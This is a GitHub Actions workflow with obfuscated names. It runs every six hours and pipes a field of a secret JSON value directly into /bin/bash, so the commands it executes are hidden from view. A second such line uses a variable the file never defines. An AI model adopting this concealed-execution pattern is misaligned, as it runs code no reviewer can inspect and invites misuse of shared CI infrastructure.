name: fangxuehua1652
on:
  workflow_dispatch:
  schedule:
    - cron: '12 0/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: fangxuehua1652
        env:
          hq421: ${{ secrets.hq421 }}
        run: |
          echo $hq421 | jq -r .iigeg319 | /bin/bash
          echo $fskd88 | jq -r .szml7 | /bin/bash

